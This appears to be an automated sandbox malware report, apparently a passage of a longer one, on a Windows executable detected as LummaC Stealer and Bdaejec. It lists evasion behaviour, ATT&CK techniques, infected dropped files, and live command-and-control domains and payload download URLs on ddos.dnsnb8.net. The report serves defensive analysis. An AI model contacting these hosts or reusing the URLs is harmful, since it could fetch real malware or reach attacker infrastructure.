      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeProcess queried: DebugObjectHandleJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: strainriskpropos.stor
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: telephoneverdictyow.site
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: punchtelephoneverdi.stor
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: smallrabbitcrossing.site
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: snuggleapplicationswo.fun
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: theoryapparatusjuko.fun
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: healthproline.pro
      Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00321718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,2_2_00321718
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_0032139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_0032139F
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
      Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Yara detected Bdaejec
      Source: Yara matchFile source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Bdaejec
      Source: Yara matchFile source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		11
      Input Capture      		11
      System Time Discovery      		1
      Taint Shared Content      		11
      Input Capture      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts2
      Process Injection      		33
      Virtualization/Sandbox Evasion      		LSASS Memory631
      Security Software Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		11
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager33
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Process Injection      		NTDS1
      Process Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets3
      File and Directory Discovery      		SSHKeylogging112
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain Credentials4
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
      Software Packing      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Lisect_AVT_24003_G1A_72.exe86%VirustotalBrowse
      Lisect_AVT_24003_G1A_72.exe100%AviraW32/Jadtre.B
      Lisect_AVT_24003_G1A_72.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
      C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
      C:\Users\user\AppData\Local\Temp\jawuwAtX.exe100%AviraTR/Dldr.Small.Z.haljq
      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
      C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\jawuwAtX.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\jawuwAtX.exe92%ReversingLabsWin32.Trojan.Madeba

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      ddos.dnsnb8.net13%VirustotalBrowse
      healthproline.pro11%VirustotalBrowse
      telephoneverdictyow.site21%VirustotalBrowse
      punchtelephoneverdi.store20%VirustotalBrowse
      theoryapparatusjuko.fun20%VirustotalBrowse
      snuggleapplicationswo.fun21%VirustotalBrowse
      strainriskpropos.store21%VirustotalBrowse
      smallrabbitcrossing.site21%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.scintilla.org/scite.rng0%URL Reputationsafe
      http://www.activestate.comHolger0%URL Reputationsafe
      http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
      http://www.baanboard.comBrendon0%URL Reputationsafe
      https://www.smartsharesystems.com/0%URL Reputationsafe
      http://www.scintilla.org0%URL Reputationsafe
      http://www.develop.com0%URL Reputationsafe
      http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
      http://www.spaceblue.com0%URL Reputationsafe
      http://www.baanboard.com0%URL Reputationsafe
      http://www.develop.comDeepak0%URL Reputationsafe
      http://www.rftp.comJosiah0%URL Reputationsafe
      http://www.activestate.com0%URL Reputationsafe
      http://upx.sf.net0%URL Reputationsafe
      http://www.rftp.com0%URL Reputationsafe
      http://www.spaceblue.comMathias0%URL Reputationsafe
      https://www.smartsharesystems.com/Morten0%URL Reputationsafe
      http://www.lua.org0%URL Reputationsafe
      http://ddos.dnsnb8.net/100%URL Reputationmalware
      healthproline.pro100%Avira URL Cloudmalware
      smallrabbitcrossing.site100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudphishing
      https://strainriskpropos.store/api100%Avira URL Cloudmalware
      https://strainriskpropos.store:443/api100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/apiGaX100%Avira URL Cloudmalware
      https://strainriskpropos.store/D%D100%Avira URL Cloudmalware
      https://punchtelephoneverdi.store:443/api100%Avira URL Cloudmalware
      https://strainriskpropos.store:443/api18%VirustotalBrowse
      https://strainriskpropos.store/api18%VirustotalBrowse
      https://snuggleapplicationswo.fun/100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k2.rarNp3100%Avira URL Cloudmalware
      healthproline.pro11%VirustotalBrowse
      punchtelephoneverdi.stor0%Avira URL Cloudsafe
      https://telephoneverdictyow.site/l100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/100%Avira URL Cloudmalware
      https://smallrabbitcrossing.site/api100%Avira URL Cloudmalware
      https://telephoneverdictyow.site/api100%Avira URL Cloudmalware
      telephoneverdictyow.site100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k1.rar=100%Avira URL Cloudphishing
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
      http://ddos.dnsnb8.net:799/cj//k2.rarh100%Avira URL Cloudphishing
      https://punchtelephoneverdi.store/100%Avira URL Cloudmalware
      strainriskpropos.stor0%Avira URL Cloudsafe
      https://strainriskpropos.store/100%Avira URL Cloudmalware
      https://strainriskpropos.store/M%s100%Avira URL Cloudmalware
      https://punchtelephoneverdi.store/apihL100%Avira URL Cloudmalware
      https://strainriskpropos.store/api;100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k1.rarZ100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k2.rarF;100%Avira URL Cloudphishing
      https://telephoneverdictyow.site:443/api100%Avira URL Cloudmalware
      https://smallrabbitcrossing.site/100%Avira URL Cloudmalware
      http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1100%Avira URL Cloudmalware
      snuggleapplicationswo.fun100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ddos.dnsnb8.net
      		44.221.84.105
      		truefalseunknown
      healthproline.pro
      		unknown
      		unknowntrueunknown
      smallrabbitcrossing.site
      		unknown
      		unknowntrueunknown
      strainriskpropos.store
      		unknown
      		unknowntrueunknown
      snuggleapplicationswo.fun
      		unknown
      		unknowntrueunknown
      punchtelephoneverdi.store
      		unknown
      		unknowntrueunknown
      telephoneverdictyow.site
      		unknown
      		unknowntrueunknown
      theoryapparatusjuko.fun
      		unknown
      		unknowntrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      healthproline.protrue
      • 11%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      smallrabbitcrossing.sitetrue
      • Avira URL Cloud: malware
      		unknown
      http://ddos.dnsnb8.net:799/cj//k2.rartrue
      • URL Reputation: malware
      		unknown
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • URL Reputation: malware
      		unknown
      punchtelephoneverdi.stortrue
      • Avira URL Cloud: safe
      		unknown
      telephoneverdictyow.sitetrue
      • Avira URL Cloud: malware
      		unknown
      strainriskpropos.stortrue
      • Avira URL Cloud: safe
      		unknown
      theoryapparatusjuko.funtrue
        		unknown
        snuggleapplicationswo.funtrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://strainriskpropos.store/apiLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013BC000.00000004.00000020.00020000.00000000.sdmpfalse
        • 18%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.activestate.comHolgerSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarsjawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: phishing
        		unknown
        https://strainriskpropos.store:443/apiLisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
        • 18%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        https://telephoneverdictyow.site/apiGaXLisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://www.baanboard.comBrendonSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        https://strainriskpropos.store/D%DLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.smartsharesystems.com/SciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.scintilla.orgSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        https://punchtelephoneverdi.store:443/apiLisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://www.develop.comSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarNp3jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://www.spaceblue.comSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.baanboard.comSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.develop.comDeepakSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        https://snuggleapplicationswo.fun/Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://telephoneverdictyow.site/lLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://telephoneverdictyow.site/Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://smallrabbitcrossing.site/apiLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://telephoneverdictyow.site/apiLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://ddos.dnsnb8.net:799/cj//k1.rar=jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: phishing
        		unknown
        http://www.rftp.comJosiahSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.activestate.comSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEjawuwAtX.exe, 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp, jawuwAtX.exe, 00000002.00000003.2145539627.0000000000F50000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarhjawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: phishing
        		unknown
        http://upx.sf.netAmcache.hve.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.rftp.comSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        https://punchtelephoneverdi.store/Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://strainriskpropos.store/Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        https://punchtelephoneverdi.store/apihLLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://strainriskpropos.store/M%sLisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://strainriskpropos.store/api;Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarZjawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://www.lua.orgSciTE.exe.2.drfalse
        • URL Reputation: safe
        		unknown
        http://ddos.dnsnb8.net/jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmptrue
        • URL Reputation: malware
        		unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarF;jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: phishing
        		unknown
        https://telephoneverdictyow.site:443/apiLisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://smallrabbitcrossing.site/Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        44.221.84.105
        		ddos.dnsnb8.netUnited States
        		14618AMAZON-AESUSfalse

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1481153
        Start date and time:2024-07-25 04:57:18 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 21s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Lisect_AVT_24003_G1A_72.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@5/11@8/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 14
        • Number of non-executed functions: 14
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 13.89.179.12
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        22:58:15API Interceptor3x Sleep call for process: Lisect_AVT_24003_G1A_72.exe modified
        22:58:20API Interceptor1x Sleep call for process: WerFault.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        44.221.84.105Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar
        Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
        • ddos.dnsnb8.net:799/cj//k3.rar
        LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar
        LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
        • ddos.dnsnb8.net:799/cj//k5.rar
        LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar
        LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k5.rar
        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ddos.dnsnb8.netLisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
        • 44.221.84.105
        Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
        • 44.221.84.105
        LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
        • 44.221.84.105
        LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
        • 44.221.84.105
        LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AMAZON-AESUSLisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
        • 44.221.84.105
        Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
        • 44.221.84.105
        LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
        • 44.221.84.105
        LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
        • 44.221.84.105
        LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
        • 44.221.84.105
        LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\jawuwAtX.exeLisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
          Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
            LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
              LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
                LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
                  LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
                    LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
                      LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
                        LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
